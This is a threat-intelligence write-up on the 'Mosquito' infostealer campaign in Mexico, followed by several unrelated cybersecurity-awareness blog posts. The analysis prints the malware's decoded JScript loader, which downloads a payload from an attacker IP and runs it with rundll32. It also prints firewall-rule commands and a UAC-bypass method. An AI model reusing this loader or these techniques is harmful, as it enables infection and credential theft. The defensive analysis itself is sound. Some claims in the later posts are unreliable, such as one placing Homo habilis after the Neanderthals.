Mosquito the new Infostealer arrives to Mexico

By Gerardo Corona & Jesús Dominguez from Ocelot Team

Context

The Threat Intelligence team at Metabase Q has recently identified a new variant of a Brazilian-based Infostealer dubbed as Mosquito by Ocelot team. Initially hitting Brazil in a campaign back in July 2023, Mosquito has recently emerged in a new campaign specifically targeting businesses in Mexico, employing sophisticated techniques and multi-stage infection chains similar to the well known sophisticated banking Trojan Carbanak. The purpose of this blog is to share indicators of compromise with the community to help implement proactive measures to mitigate this emerging threat.

Metabase Q protection strategy

At Metabase Q, we are focused on constantly updating our systems and protection strategy for new attackers and techniques. Following this discovery, our team, and platform rapidly integrated the Botnet Fenix techniques into our Batuta Platform for optimal detection and response:

  1. Threat Intelligence: Metabase Q Threat Intelligence team extracts Mosquito techniques, indicators of compromise, and updates actor’s profiling database.
    • Initiates the takedown process of malicious domains
  2. Crimeware Simulation: The Ocelot team reverse engineers Mosquito’s components, codes it from scratch in our lab, and adds it to our Batuta platform to replicate it and test it in our customers’ networks.
  3. Blue Team: The SOC team is trained with the latest techniques identified, and hunting detections implemented for tracking.
  4. Security Validation: Detection Gaps identified, and time to Detect & Response improved.


Figure 1. Batuta Platform

In the next section, we will provide a comprehensive technical analysis to guide proactive defensive strategies.

Analysis using the Diamond Model

Adversary

Mosquito
Status Active
Source Country Brazil
Since May 2023
Last Activity December 2023
Adversary Type M.a.a.S. (Malware as a Service), InfoStealer
Motivation Financial Gain
Related Groups Not identified

Table 1. Adversary

Victims


Figure 2.

Affected Sector End users in multiple sectors
Affected countries or regions. Argentina, Brazil, Chile, España, Mexico, Panama, Peru, Spain, United States
Affected global organizations. End users of Mexican companies
Affected Mexican organizations End users of Global companies

Table 2. Victims

Capabilities

Tactics, Techniques, and Procedures (TTPs)

  • Distribution vector through phishing (malvertising).
  • Multi-stage infection chain.
  • DLL Side Loading.
  • Injection of malicious code into remote processes.
  • XOR decryption technique to decode its configuration file.
  • Gathering crucial system information, as well as data related to installed browsers.
  • Communication with attackers’ command and control server in an encoded format.

Infrastructure

Technology

  • Command & Control.
  • Multiple components.

Technical analysis

The following analysis focuses on a campaign targeting Mexican organizations. The complexity of the multi-stage infection process is illustrated below:


Figure 3. Infection process

  1. The initial infection begins with the delivery of a phishing email containing a malicious PDF attachment.



    Figure 4. Phishing with malicious content

  2. Within its code, the following can be observed:A: It performs Operating System language validation, looking for the Mexican one.B: Upon satisfying the aforementioned condition, it downloads the file corresponding to the next stage.


    Figure 5. MSI Extract Code


    Figure 6. MSO Language ID

    During the execution of the file, the pop-up window shown in Figure 7 (customized by the threat actor), is displayed:


    Figure 7. Pop-up Custom Window

  3. Then the MSI installer downloads an XML file, this new file has an eval function that receives a UTF-16 encoded string as a parameter. Below the result of the decoded blob:
        function NzBMGJ(base64) {

            var ADODB = new ActiveXObject("ADODB.Stream");
         
            // Converte a string base64 para um array de bytes
            var decodedBytes = [];
         
            var dom = new ActiveXObject("Microsoft.XMLDOM");
            var elem = dom.createElement("tmp");
            elem.dataType = "bin.base64";
            elem.text = base64;
            var byteArray = elem.nodeTypedValue;
            // Abre o ADODB.Stream e escreve o array de bytes
         
            ADODB.Type = 1; // adTypeBinary
            ADODB.Open();
            ADODB.Write(byteArray);
            ADODB.Position = 0;
            return ADODB;
         }
         function FrhVE(stream, filePath) {
            try {
                var fileStream = new ActiveXObject("ADODB.Stream");
                fileStream.Type = 1; 
                fileStream.Open();
                fileStream.Write(stream.Read());
                fileStream.SaveToFile(filePath, 2);
                fileStream.Close();        
                return true;
            } catch (e) {
                return false;
            }
         }
         
         function WCOcO(dllPath, functionName) {
            var shell = new ActiveXObject("WScript.Shell");
            var command = "rundll32 " + dllPath + "," + functionName;   
            try {
                shell.Run(command, 0, false);
                return true;
            } catch (e) {
                return false;
            }
         }
         var tempPath = AWxAP();
         var NameR = leyGgr(10) + ".tmp";
         var NameD = leyGgr(10) + ".tmp";
         var NameFileTemp = tempPath + "\\" +NameR;
         var NameFileTempD = tempPath + "\\" +NameD;
         var url = "http://107.158.94.115/Game/a.jpg";
         if (KFOqQO(url, NameFileTemp)) 
         {
             if ((NameFileTemp))
             {
                 var FILEText = CjWAn(NameFileTemp);
                 FILEText = MSfaTZDPw(FILEText);		
                 var stream = NzBMGJ(FILEText);
                 FrhVE(stream,NameFileTempD);
                 WCOcO(NameFileTempD,"C03345 a34332078607e2475635f256d61674f2531313e24393e2835313e2730313f2f2a307474786a333327607a6e226f256d61674f2531313e24393e2835313e2730313f2f2a307474786a3233223a31332");		
             }	
         }         

Examination of this new code reveals a new image file to be downloaded:


Figure 8. Next stage URL

This “image” is downloaded with the legitimate bitsadmin Windows tool and saved in the user’s%TEMP% path, with a random name and .tmp extension:

        function KFOqQO(url, destino) {

            var shell = new ActiveXObject("WScript.Shell");
         
            var comando = "bitsadmin /transfer myDownloadJob /download /priority foreground " + url + " " + destino;   
         
            try {
                shell.Run(comando, 0, true);
                return true;
         
            } catch (e) {
                return false;
            }
         }         

The image bytes are reversed and Base64 encoded. Once decoded, the resulting file is a DLL that is run via rundll32 command:

        function WCOcO(dllPath, functionName) {
            var shell = new ActiveXObject("WScript.Shell");
            var command = "rundll32 " + dllPath + "," + functionName;   
            try {
                shell.Run(command, 0, false);
                return true;
            } catch (e) {
                return false;
            }
        }        

The DLL has only one export function named C03345:


Figure 9. Exported function

Analyzing the DLL

By looking at the PDB path, we identify the username “Musquitao” and a path describing a project created for the campaign in Mexico (2023_MX):

C:\Users\Musquitao\Desktop\2023_MX\LOAD_2023\DLL-CPP\D\x64\Release\D.pdb


Figure 10. “Musquitao” user identified

This DLL creates a .ini file with the hostname as the name at %Public%\Documents:


Figure 11. INI configuration file

This INI file contains the name of all components used in the infection chain, even though it is obfuscated.Simultaneously, the DLL decodes the modules of the next stages at runtime and drops them in the directory at:

%Public%\Documents\%USERNAME%

Figure 13 shows the decoded files, which have names randomly selected from an embedded list and stored in the .ini file for further references:


Figure 12. Decoded files from krita.dll

Finally, here is the .ini file decoded, where multiple modules are identified:

        <USER_ID>@</USER_ID>
        <DRAFT_CLIENTE>null</DRAFT_CLIENTE>
        <DLL_INJECT>%Public%Documents\user\prproc.exe</DLL_INJECT>
        <DLL_UP>%Public%Documents\user\NETSTAT.EXE</DLL_UP>
        <EXE_UAC>%Public%Documents\user\UtcDecoderHost.exe</EXE_UAC>
        <EXE_PROXY>%Public%Documents\user\WindowsActionDialog.exe</EXE_PROXY>
        <DLL_PROXY>%Public%Documents\user\krita.dll</DLL_PROXY>
        <DLL_PRO>%Public%Documents\user\edpnotify.exe</DLL_PRO>
        <EXE_LOGINS>%Public%Documents\user\winrshost.exe</EXE_LOGINS>
        <USER_OS>@</USER_OS>
  • DLL_INJECT: This module does the process injection
  • DLL_UP: This module is the injected one and checks if the process is elevated
  • EXE_UAC: This modules bypasses the Windows UAC for elevation
  • EXE_PROXY: This legitimate Krita installer (krita_installer.exe) renamed as “WindowsActionDialog.exe” that side-loads malicious DLL krita.dll
  • DLL_PROXY: Malicious DLL krita.dll
  • DLL_PRO: The final module, the Infostealer
  • EXE_LOGINS: Module to log the activities

All the files in the .ini configuration file are the same that the DLL decoded in the path

%Public%Documents\user:


Figure 13. Same file names that are in .ini configuration file

Before completing the DLL execution, a shortcut to WindowsActionDialog.exe is added to the Windows startup folder to establish persistence. Subsequently, DLL restarts the device:


Figure 14. WindowsActionDialog.exe in Windows startup folder

WindowsActionDialog and Krita.dll

After the device restart, the legitimate Krita installer (renamed as WindowsActionDialog.exe) is executed. Then this installer sideloads the malicious DLL, krita.dll.


Figure 15. krita.dll string found

The filename ‘krita.dll’ is specified in the .ini configuration file with the tag <DLL_PROXY> as:

<DLL_PROXY>%Public%Documents\user\krita.dll</DLL_PROXY>

But where does krita.dll come from?

Krita is a free and open-source painting program, andWindowsActionDialog.exe is the legitimate krita desktop installer. However, this executable is vulnerable to DLL side-loading, and therefore used to run krita.dll DLL.

Find out more information about DLL side-loading at this blog:

https://www.metabaseq.com/filezilla-dll-side-loading/

Krita.dll Analysis

Now, let’s delve into the analysis of the malicious krita.dll and its exports; this is the DLL_PROXY component:


Figure 16. Fake krita.dll, this is the malicious one

Next, in Figure 17, the legitimate krita.dll DLL is displayed, featuring only one export function.


Figure 17. Original krita.dll and its exports

There are significant differences. The malicious krita.dll executes the following steps:

  1. Firstly, the DLL retrieves the hostname, opens the .ini configuration file and locates the <DLL_INJECT> tag, to determine the next file to be loaded, as detailed in step 2.


    Figure 18. DLL getting the hostname


    Figure 19. DLL_INJECT tag from .ini file

  2. Next, the file is read and decoded into a new file at %TEMP% directory with a random name and .tmp extension:


    Figure 20. New DLL dropped into %TEMP% path

    Subsequently, this new .tmp file is loaded with LoadLibrary API since it is a DLL:


    Figure 21. LoadLibrary API to load the new DLL


    Figure 22. DLL name loaded from disk

    Following this, GetProcAddress is called to load and execute AtlThunk_IniData export:


    Figure 23. GetProcAddress lpProcName parameter

    Further details about this new DLL known as DLL_INJECT, are provided in the next section.

DLL_INJECT

The figure 25 shows the exports of the new DLL:


Figure 24. Exports of DLL_INJECT


Figure 25. DLL_INJECT’s pdb file

This new DLL performs the same action as the previous DLL. Obtaining the hostname, opening the configuration file, and searching for a tag to load the next module. The next module is <DLL_UP>:


Figure 26. Next stage tag

Once again, the DLL content is decoded, and injected into the explorer.exe memory space, employing a well-known injection technique. This technique, facilitated by the CreateRemoteThread API, ultimately transfers the execution flow to the new DLL (DLL_UP component).


Figure 27. Process injection steps

DLL_UP:


Figure 28. DLL_UP’s pdb file

The DLL injected into the explorer.exe process creates a Mutex name depending on its parent process:

  • If the parent process is winlogon.exe, it creates a “winlogon” Mutex
  • Otherwise, it creates a Mutex with the name: “explorer”


Figure 29. Mutex code block

Subsequently, the DLL checks if the process is elevated, if it is not, the DLL reads the .ini configuration file and retrieves the filename specified in the < EXE_UAC> label, attempting to escalate privileges.

EXE_UAC:


Figure 30. EXE_UAC pdb string

This new binary is injected into another explorer.exe process that was created in a suspended state.

This module is responsible for performing User Account Control (UAC) bypass, achieved by utilizing theCOM Elevation Moniker “Elevation:Administrator!new:{GUID}” Object. This step involves the use of the following CLSIDs:

  • {3AD05575-8857-4850-9277-11B85BDB8E09} – Provides copy, move, rename and delete operations
  • {BDB57FF2-79B9-4205-9447-F5FE85F37312} – Facilitates the installation of Internet Explorer add-ons capabilities


Figure 31. COM object string

The malware uses {3AD05575-8857-4850-9277-11B85BDB8E09} COM object to copy the “cmd.exe” file from its original location in %System32% folder to the %TEMP% directory with administrator privileges. Subsequently, it renames this file to [1]bdeunlock.exe using the same COM object.


Figure 32. “cmd.exe” renamed

Following this, the second COM object is used: {BDB57FF2-79B9-4205-9447-F5FE85F37312}

To execute the WindowsActionDialog.exe (krita_loader) with elevated privileges and side-loads krita.dll with administrator privileges.

Once krita.dll is loaded with administrator privileges, it follows the same flow as discussed earlier.

The next step is to inject DLL_UP into the winlogon.exe process:



Figure 33. “winlogon.exe” PID

Then the DLL_UP creates the “Winlogon” mutex and searches for a firewall rule named as the hostname:

        C:\Windows\system32\cmd.exe /C netsh advfirewall firewall show rule name="DESKTOP-AH39K"

If the rule does not exist, it is created to allow explorer.exe Internet access:

        C:\Windows\system32\cmd.exe /C netsh advfirewall firewall add rule name="DESKTOP-AH39K" dir=in  action=allow  program="C:\Windows\explorer.exe" enable=yes

Once the rule is in place, the next step involves opening the “explorer.exe” process to inject the final module in the infection chain. This module is referred to in the configuration file as <DLL_PRO>.

DLL_PRO Analysis

This is the final step and serves as the Infostealer component. It adds the Secure Bridge library used to protect TCP traffic using SSH or SSL protocols:


Figure 34. DLL_PRO project path

This DLL has an interesting export BeginX:


Figure 35. DLL_PRO exported functions

This DLL starts collecting information about the infected system. Firstly, it gathers the following information that will be exfiltrated:

  • OS Version
  • OS Architecture
  • Installed Internet Browsers
  • Username
  • Hostname
  • DLL Version

Next, the malware decodes the following strings:

        '_GetDadosUrlIP: '
        '_GetDadosWinProductName : '
        '_GetDadosVersaoBitsWindows : '
        '_GetDadosNomeComputador : '
        '_GetDadosVersaoDLL : '
        '_GetDadosAllNavCliente : '
        '_GetDadosPluginCliente : '
        '_GetDadosPastaTEMP : '

The initial data exfiltrated is shown below:

        _GetDadosUrlIP: hxxp://www.zautoservice.eu
        _GetDadosWinProductName : Windows 10 Pro
        _GetDadosVersaoBitsWindows : 64x
        _GetDadosNomeComputador : DESKTOP-AH39K
        _GetDadosVersaoDLL : ::03/10/2023::
        _GetDadosAllNavCliente : [Iexplorer][Edge]
        _GetDadosPluginCliente : NULL
        _GetDadosPastaTEMP : %Public%Documents

And is exfiltrated via POST request to hxxp[:]//www.zautoservice.eu:


Figure 36. POST command to exfiltrate the information

And if the log.true file exists, then the data is also written into log.log file under %Public%Documents:


Figure 37. Logging data capability

The next step is to create a couple of hidden windows named as “MagnifierHost” and “MagnifierWindow”. These windows will help in capturing screens from the victims.



Figure 38. Windows creation routine

Then the malware continues by deploying a keyboard hook to intercept keystrokes from the victims:


Figure 39. Keyboard hook

And finally the malwares continues running to monitor which browser is opened by the end user, normally looking for online banking sessions to steal credentials or even to open a remote session to watch what the victim is doing:


Figure 40. “Monitorador view foi fechado” = “Monitor view has been closed”

Finally, the malware possesses the capability to take screenshots and send them via POST request, exhibiting behavior similar to that of Carbanak actors.


Figure 41. Screenshot routine

Conclusions

This brazilian-based Infostealer, exhibits advanced techniques seen previously observed in groups like Carbanak focused on the financial sector, showing a new era of sophistication in the LATAM region. The multi-stage approach makes it difficult for technologies and analysts to catch the final stage and therefore complicates the identification of the domain where the data is finally exfiltrated.

Customers at Metabase Q can directly run the latest Tactics, Techniques, and Procedures (TTPs) described in this blog from the ZeroAPT technology at the Batuta platform. This allows our customers to measure control visibility and assess the time it takes for detection and response from the SOC Team:


Figure 42. ZeroAPT SaaS Platform

IOCS

  • Domain
    • zautoservice[.]eu
  • IP Address
    • 107[.]158[.]94[.]112
  • Filename:
    • DLL_load.dll
    • krita.dll
    • DLL_IN.dll
    • DLL_UP.dll
    • DLL_load.tmp
    • krita.tmp
    • DLL_IN.tmp
    • DLL_UP.tmp
  • Hashes
    • MD5
      • 1faf16a00e5fbe14916d5ca25ec9cc99
      • 2fc6d9d9423f91435e7244bc1ad9b145
      • 36b07d5222c773f0360af531e805baac
      • 3d3ec490e03a2ef65a9b9d0e4cbebaa3
      • 4d2838fc52d22c0be48c0af9804fbb3e
      • 4d7d6467795958cda2643232abcc7bc9
      • 57a02fcb09716862814d096276d20377
      • 6c6441ac494f3c78f2ea122549d6c0ba
      • 80c3e61945c9b333bf29f1098ce03a2a
      • 82709803d538e9b145d1100b3be4cbc2
      • 904d9d44995a7cd10258f067e7874e55
      • 9bbc7fb0bf144a4a70c6682abdb328f4
      • be3e8b881c9b2641fb65320bca17e2fb
      • db6eb4d134058d71a275683cf3a59245
      • e14e7dedc98322dc23febdb6711f8fec
      • e403f4444a69a80ae1aefd0c096b81a0
      • e6e3c50948d15e042d769ae514333e60
      • f46a6c1c007953cc60bfb528dafa91a5
  • URL
    • https[:]//hper[.]in/ckywe96
    • https[:]//www[.]superdownload[.]download/?Id=bWFpbC91LzAvI2luYm94&token=otihun24h6btfih33u4k8
    • http[:]//80[.]190[.]75[.]42/arquivo_anexo.pdf
    • http[:]//80[.]190[.]74[.]36/70453477219/file/file.php??427677989
    • https[:]//drive[.]google[.]com/u/0/1/abc/def/ghi[.]7z
    • https[:]//jf27z[.]app[.]goo[.]gl/eJZR9poW7FC968n47
    • httP[:]//107[.]158[.]94[.]115/Game/

Quantum Apocalypse

Every form of life has become completely extinct in different historical periods. From the extinction of dinosaurs to the glaciations and the disappearance of our fellow human ancestors. The emergence of a new link in the species chain, which has improved physically and neuronally, implies the later disappearance of the predecessor: there are no Neanderthals that have survived the appearance of the Homo habilis.

This approach raises the question: will it be our own hands that lead to our extinction?

Technological evolution
Image 1: Technological evolution

During the last decade, we have witnessed technology grow at a constant rate, consistent with our own evolution. However, nothing prepared us as a society to the rapid and unstoppable technological growth that started with the COVID-19 pandemic. The emergence of this global challenge not only meant a public health issue, but also the social isolation of people. It became clear that there was a need to evolve, just like our cave-dwelling ancestors, to stay connected and resilient in this new way of life.

We managed to evolve, technologically, up to ten years in just a couple of them. We realized the infinite possibilities available for us to connect without even leaving our homes. But what happens to our security under these communication channels? In most areas of our daily life, digitalization represents technological evolution by completely changing the rules on how we handle data privacy.

As a new link in the evolutionary chain, artificial intelligence (AI) allows machines to efficiently solve problems or tasks, even better than a human being. In its simplest form, it uses data sets to determine solutions, patterns, and even create them from scratch.

There is an inherent risk in the use of computer systems. We must guarantee that our information is managed securely, regardless of the digital service or system we are using. With the emergence of advanced AI, business approaches to digital platforms are also changing. Should we ask ourselves, then, how the Internet is financed?

Clarissa Véliz Perales, Philosophy and Ethics professor at Oxford University, warned that “the company’s business model is to sell its users’ personal data to banks, insurance companies, governments and other companies that, in turn, resell it and can be used for almost anything […]”, a situation under which most social networks and websites based on AI work. Therefore, it is safe to say that day by day, every second, huge amounts of data are collected, with and without our consent.

Considering the amount of information in cyberspace and technological evolution we are facing, what would happen if all the data that today is encrypted on the network is suddenly opened? If all the private and confidential information in world were to be exposed in a computer with endless capabilities. These computers are called quantum computers, with the ability to analyze and decrypt data in a matter of seconds, with billions of possibilities and meanings.

By employing computers with exceptional physical capabilities and systems based on significantly advanced AI, we could solve almost any problem of humanity… or decrypt data that would cause irreparable damage to society.

Quatum Computer
Image 2: Quatum Computer

Ilyas Khan, CEO of Quantinuum, explains that quantum evolution is a threat to our lives, stating that “quantum computers will render most existing encryption methods useless.”

When this happens, we will be facing the possible extinction of online privacy and security: the quantum apocalypse.

Unlike apocalyptic prophecies where the Earth is hit by earthquakes and massive floods, the quantum apocalypse will be brought by computers capable of breaking data encryption protocols and schemes. They will create the possibility for those who use them to manipulate information at their convenience. If cybercriminals had access, they could empty bank accounts, block the defense systems of entire governments and access everything considered “private” in the digital world.

Is it time to burn our devices and close all our digital accounts? Is it time for total panic?

The answer is no. Like every point in human history since the first hominid appeared on Earth, evolution cannot be slowed down. Our society, now digitized, cannot turn back the clock on the technological growth on which not only we are dependent for communication, but also to meet our basic needs such as the healthcare sector and food supply chains.

What can I do to protect myself while computing evolves?

Waiting for the evolution to continue may seem too passive an action for Internet users. Currently, we are totally exposed; the culture of personal data protection is still in its early stages, especially in the framework of domestic regulations, so many of the preventive and protective actions need to start at our homes:

  • Verify to whom we provide our information: be certain that we provide our data to reliable and truthful entities.
  • Block unnecessary requests: as users, we must provide only the necessary data to be able to use digital services.
  • Read, read, read: every entity that uses personal data is required by national law to provide a privacy notice or a data processing notice. It is our obligation as users of digital services to read such policies to make sure how and what is done with our data.

Secure passwords: it is essential not to use the same password between low-risk systems and critical systems; for example, do not use the password of a social network in a bank account.

Research has been conducted to generate technological solutions that prevent the quantum apocalypse, establishing cybersecurity strategies to protect all sectors of society, from governments to every individual user with a computer at home. These solutions are called “post-quantum” because they are intended to be computer and quantum intelligence proof. While the changes represent a challenge for any generation, not doing something about it is not an option.

Cybersecurity for children and teenagers.

If you are reading this blog, it is because you, as well as a high percentage of the population, have started to look for information through the Internet, instead of books and printed media. We have seen this use of technology increase in the last two decades, but since 2020, its growth has been exponential. Today, we see how children are born with this chip, this information about technologies that allow them to know how to use a tablet or a cell phone before they can talk.

Therefore, it is essential to have a protection strategy, a plan that allows us to have a secure life in the digital world. According to the Inter-American Development Bank in Latin America, only 14 of the 26 countries that are members of the IDB have a National Digital Strategy.  The IDB document is focused on how countries can have a better organization on how to use technology, close access gaps, to keep children, adolescents, and adults safer.

With the help of this document, it is expected that a digital strategy can be developed:

  1. The rights of children and teenagers in the digital environment are made effective.
  2. Use of technology with ethical and responsible principles.
  3. Cybersecurity tips.
  4. How to manage the content and data shared by children and adolescents.
  5. Teaching parents to use parental controls on their children’s devices.
  6. Communicate to children and teenagers that there are governmental services to help and report when there are problems or digital crimes.

What makes this population group more vulnerable? Their age, their innocence, and their need to assert themselves before the world and build themselves as individual beings are characteristics of children and teenagers that are more accentuated than the adult population.  So those of us who are adults, children, and adolescents, seek social acceptance, interpersonal connection, and fun through digital media. How can we protect them? First, by learning and protecting those of us who care for and educate them.

It is important to explain to them why they should not share personal information on digital platforms and be able to guide them in good practices. Doing these activities together can help build a bond of trust. Invite them to create an avatar instead of posting a picture of themselves and do the same yourself, lead by example. Teach them how to use privacy settings, choose the right people to share their information, photos, and activities with, and talk to them about the risks that exist in the virtual world.

In addition to the security settings and the activation of parental controls, ensuring that they don’t access websites or content that they shouldn’t be seeing. We should teach our kids about posting on sites. Deleting a post does not mean it’s permanently gone, all their online posts, comments, and shares are part of their digital footprint. We should also let them know the importance of privacy. We should also teach our children how much personal information is too much information online. Remember that these types of identifying information (names, dates of birth, school names, and hometown), if exposed in a data breach, could make them vulnerable. We recommend establishing a series of rules such as only sharing images with close family members, asking before sending a picture and using other names on their online profiles, among others.

Cybersecurity for childrem

How do we build digital care for the well-being of children and adolescents?

Communication is key, so the first step is to talk. Sharing personal experiences that happen to us even as adults helps to create a bond of trust and receptivity.

When talking to children it is important to approach the subject through metaphors and situations or concepts that are familiar to them, for example, caring for a pet or personal or physical care. With this, we are communicating the message that they should take care of themselves not only individually but also collectively, because, just as in the pandemic, when using a mask, we take care of the people we love, the same happens in the digital world: if we have good security, we are taking care of our family and friends.

  • Communication in the cyber world is here to stay, that is why prohibition will not be efficient, it is much better to help them to open and choose safe spaces where they can communicate and play.  In addition, this will allow us to know what kind of applications, platforms, and tools they use while using the devices.
  • Another recommended practice is to determine fixed times for device use. When it is found that they are accessing content that is appropriate for their age, it is recommended to have a conversation in which the risks are explained and if necessary, proceed to block access to the site, game, application, etc.
  • Establish a VPN connection in your home. This connection will help you to ensure that no stranger can identify any member of your family.
  • Finally, it is important to teach them the parallels of the dangers between the physical and digital worlds. For example, if they are taught that it is dangerous to talk to strangers in the physical world, the same should apply to the web.

Today, technology occupies a very important place and with the arrival of the metaverse, it will become more and more important.  Today let’s work on cybersecurity as a shared responsibility; we must help generate cybersecurity awareness from an early age, this will help reduce the risks to which they are exposed.

Social Engineering Attacks: getting smarter.

“Bullying”, “insistence”, and “deception”, are some ofthe words that characterize the digital life of children and adolescents. With theuse of social media, minors are exposed to these worrying behaviors that wemust confront. In recent years, the emergence of new social media platforms andthe subsequent strengthening of existing ones has brought great advantages forbringing people together, leaving aside geographical boundaries.

COVID-19pandemic brought with it an increase in the use of social media, which hasallowed us to reduce the impact of isolation and lack of face-to-face humaninteraction on interpersonal relationships. However, this has also brought withit new threats, such as social engineering attacks that are becoming much moreintelligent and are accompanied by the evolution of technologies.

The Mexican National Survey on Availability and Use of ICT in Households, ENDUTIH, reveals that 21.3 million Internet users are between 6 and 18 years old, so we asked ourselves the following question:

What are the risky behaviors, cyberattacks, and threats to which underage users are exposed?

First, it isimportant to be aware that most attacks make use of a technique called socialengineering, which is based on emotional manipulation. So, what is socialengineering? It is the practice in which actions are carried out that seek toinfluence people’s attitudes and behaviors, based on the study of our thoughts,feelings, and behaviors. In the digital world, social engineering is usuallyfocused on creating and performing deception techniques to obtain anindividual’s personal and confidential information, which allows them toperform a wide range of activities ranging from selling such information tocommitting crimes using the stolen identity.

As mothers,fathers, guardians, teachers, and adults who have minors under their care, wemust be alert to the main threats facing children and adolescents. What arethey? In 2022, the biggest cyber risks are:

1. Sharing Sensitive Content:

In Mexico, morethan 50% of minors have an electronic device with internet access, and 33% ofthem do not receive adequate education about the dangers of its use.

Let’s teach our children how to maintainadequate security filters when sharing content on social networks. Some of therecommendations are:

  • Share only with trusted contacts
  • Keep your profile “private”,accessible only to people you know and trust.
  • Use strong passwords that are 12 to 18characters long. Ideally, use a password manager such as LastPass or Apple’sKeyChain.
  • Do not accept requests from unknownpersons.

2.     Doxing:

Have you ever heard this term before?

Doxing is the act of revealing personal,banking, telephone, work, or intimate information, as well as photos. Itspurpose is to threaten a person or cause intentional damage, usually tocomplete revenge.

This type ofdigital gender violence is one of the main threats considered this year,especially for the female population.

3.    Grooming:

The practice ofgrooming is a social engineering technique in which an adult maintains contactwith minors, seeking to gain their trust through deception, friendlyconversations, and sometimes gifts. The objective is to convince them toperform illegal actions or sexually abuse them.

How it is performed?

The most common vector contacts through streamingrooms where the attacker approaches users offering gifts such as tokens or characters. Eventually, threats to obtain personal information such as bankcards, personal accounts, digital assets, or compromising photographs.

Social Engineering

4.     Catfishing:

Catfishing, or catfish, is another socialengineering technique that is similar to cloaking. This happens when attackerscreate fake profiles on social media platforms to scam or abuse a user.Typically, their profile has fake personal information that is enhanced byphotographs or videos, creating the appearance of a legitimate profile, but infact, its content may come from illegitimate sources or from users who havebeen victims of identity theft.

This practice is usually very popular inonline dating platforms, where they seek to romance their victim, creatingemotional ties strong enough to appeal to enough trust and start with the scam:borrowing money with the excuse of being going through an emergency, asking fordonations for the charity they supposedly work for, even sending maliciousfiles or links that infect the device and access the victim’s personalinformation.

How toprevent it?

First, it isimportant to accept that we need to face these threats and be aware of them. Bybeing informed, we can then take the next steps.

The next stepwould be to know and understand what are the new digital trends and networksthat minors use to socialize and maintain human relationships in thispost-pandemic technological era.

Once we know clearly,we can move on to educating minors. If we understand the risks, we can sharewith them basic cybersecurity strategies that will help take care of theirwell-being and integrity.

Acting humanly and kindly is what makes us strong. So, let’s look forstrategies to learn together with our children, nieces, nephews, students, andall the underage people we live with. By learning about cybersecurity together,we are not only protecting them, but we are strengthening the trust that willallow us to take care of them and protect them closely

The Internet of Things, A journey through time

We are now living adigital revolution, in which the concept The Internet of Things is very commonand a part of our lifestyle. This has brought many conveniences and advantages,for example, the ability to give new features and functionalities to a deviceinstead of having to replace it. Our devices can evolve with every update andadapt to what we require on demand.

To understand this better, let’s travel a little back in time when theinternet and things were elements that rarely merged. This reading gives anostalgic flashback where we can remember the tone (or sound) when the internetconnection was established on your computer through the telephone line, whenyou made your first searches in the browsers, met people with the sameinterests in other parts of the world and even communicating with friends realtime miles away.‍

The internet seemed likea safe and magical place. In this way the internet and the computer were partof the same concept and exclusively related to each other; cell phones, lightbulbs, medical equipment, refrigerators, security cameras, televisions,watches, etc., belonged to a different universe. Ah, those were the good olddays, where everything was more complex or simple depending on the point ofview. Even for some readers who have no memory of the “PostModernity” era, the prospect of a life without digital access will surelyseem, ironically, a science fiction story.

The merge of bothconcepts was a process that began with slow, being as in any scientific processtrial and error. Step by step the internet was incorporated and standardized asan essential part in our social development, objects began to include smallcomputers allowing more capacity of connectivity. These devices began toreceive the adjective “smart” because with a network connection theycould send alerts expanding their capabilities and communication tools, at thesame time transmit data. Mainly allowing to improve our interactive experiencewith these objects, as well as to facilitate and/or automate processesvirtually in all branches of industry, science and social. While this happensthese devices track and collect information from users, such as their habitsand preferences creating user profiles that can be used to segment advertisingcampaigns, modify prices through the possibility of purchase, among others.

Suddenly we find ourselves today ina stage that some call “The Age of Hyper Digitalization”, clearlythere is no such dial-up connection tone, and we take for granted theavailability of access and connectivity to networks. At home as in the office,we add devices and trust them, the question is “Why shouldn’t I trustthem?”, if their name clearly says, they are “smart”. The adjective issimply a marketing term that has much better acceptance than if they werecalled “Networked objects with user analysis capabilities”, which is notan attractive name and could be mistrustful.

We have mentioned how convenientInternet-enabled devices can be, however, it is important to keep in mind thatthey also represent serious threats to our digital environment. Unfortunately,many of these members of the Internet of Things (IoT), unlike the most commonoperating systems we use on our computers, lack continuous updates. Letting asystem operate in this way gives cyber attackers the opportunity to takeadvantage of this lack of maintenance, leaving vulnerabilities exposed for longperiods of time, the more devices connected the greater the number of attackvectors. To make this clearer, let’s imagine that the lock on our house door isnot working, it is obvious that we should fix it to eliminate thisvulnerability. What would happen if we decided to procrastinate this weakness?Eventually some attacker will discover it and will probably share his discoverywith other attackers and anyone who knows this “secret” will be ableto access rob us.

Smart home

It would be very difficult andimpractical to create such updates and patches on our own, but there areactions we can take to prevent these vulnerabilities:

  1. Buy     devices that have a good reputation and from brands that promote good     practices of continuous updating.
  2. Segment     our network. For example, if we are at home we should create a network for     our trusted devices, another for all those belonging to IoT and finally an     exclusive network for guests.
  3. Preferably     these networks should remain hidden and with IP access control lists.
  4. Not     only should we consider the “coolness” of any IoT device that we     would like to install at home, but we also need to consider the safety of     the environment over aesthetics.

The Internet of Things is becoming an important partof our daily activities, eventually we will be back in the generational loopwhere conceiving of a life before this “smart” devices will seem very “vintage”.We are now facing, individual and collective challenges, centered on theimperative need to grow a digital awareness culture where cybersecurityknowledge is not only a specialized subject, on the contrary, we are all everyday more connected to the network and devices, because of this we need to havethe tools and information to prevent attacks protect our personal data.

10 Examples of Technological Risks on the Internet: Abuses, Dangers, and Relevant Statistics

Technological progress has yielded countless benefits but has also birthed considerable risks in the digital realm. This post delves into ten specific instances of technology misuse, unveiling the risks and dangers associated with internet use.

  1. Cyberbullying: A concerning phenomenon using technology to harass and intimidate individuals online. According to Statista, 38% witness cyberbullying cases on social media daily

  2. Sexting: The exchange of explicit content via tech devices, particularly among minors, poses significant digital risks. A survey by SendNudes, supported by human rights and responsible ICT organizations, found 80% of women and 75% of men consider consent crucial when sending intimate images

  3. Phishing Scams: Deceptive tactics employed by criminals to acquire sensitive personal and financial data. This can result in identity theft and substantial financial losses. Statista estimates 13.5 million unique phishing sites globally, underscoring the breadth and gravity of this online threat.

  4. Online Predators: Individuals leveraging internet anonymity to target and manipulate vulnerable people, primarily children. According to the Internet Watch Foundation (IWF), 80% of victims were girls aged 11 to 13, emphasizing the urgency to protect youths online with effective preventive measures.

  5. Cyberstalking: Persistent and obsessive monitoring of someone’s online activities without their consent, causing severe distress and privacy invasion. UNICEF warns about online violence, cyberstalking, and digital harassment affecting 70.6% of connected 15 to 24-year-olds worldwide.

